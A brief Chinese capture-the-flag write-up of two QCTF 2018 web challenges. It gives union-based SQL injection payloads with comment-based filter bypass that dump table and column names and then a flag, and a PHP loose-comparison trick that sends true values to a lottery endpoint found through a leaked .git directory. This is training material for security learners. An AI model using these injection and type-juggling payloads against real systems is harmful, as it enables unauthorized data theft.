QCTF-2018-Web-Wp
QCTF-2018-Web-Wp
- 主要方向不是web所以只记录自己做过的题目
NewsCenter
从33066感觉应该是出题人给的提示让我们往sqli方向去 然后开始注入发现盲注benchmark有点感觉后来试了试联合查询发现很简便
先猜字段数======>3
然后找表名======>
h'union/**/select/**/1,2,table_name/**/from/**/information_schema.tables#
得到表名:secret_table
列名======>
h'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="secret_table"#
//id,fl4g
flag:
h'union/**/select/**/1,2,group_concat(fl4g)/**/from/**/secret_table#
Lottery
买彩票… 扫了一遍目录发现robots里面有.git 于是源码泄露一波 了解了大致的过程后 陷入的本地爆破随机数的深坑 最后回到验证函数发现只要输入是true那么无条件true
function buy(){
$win_numbers="asdasda";
$same_count=0;
for($i=0; $i<7; $i++){
if(true == $win_numbers[$i]){
$same_count++;
}
}
echo $same_count;
}
buy();
?>
所以修改buy.js
data: JSON.stringify({ action: "buy", numbers: [true,true,true,true,true,true,true] })
等咱有钱了就买flag….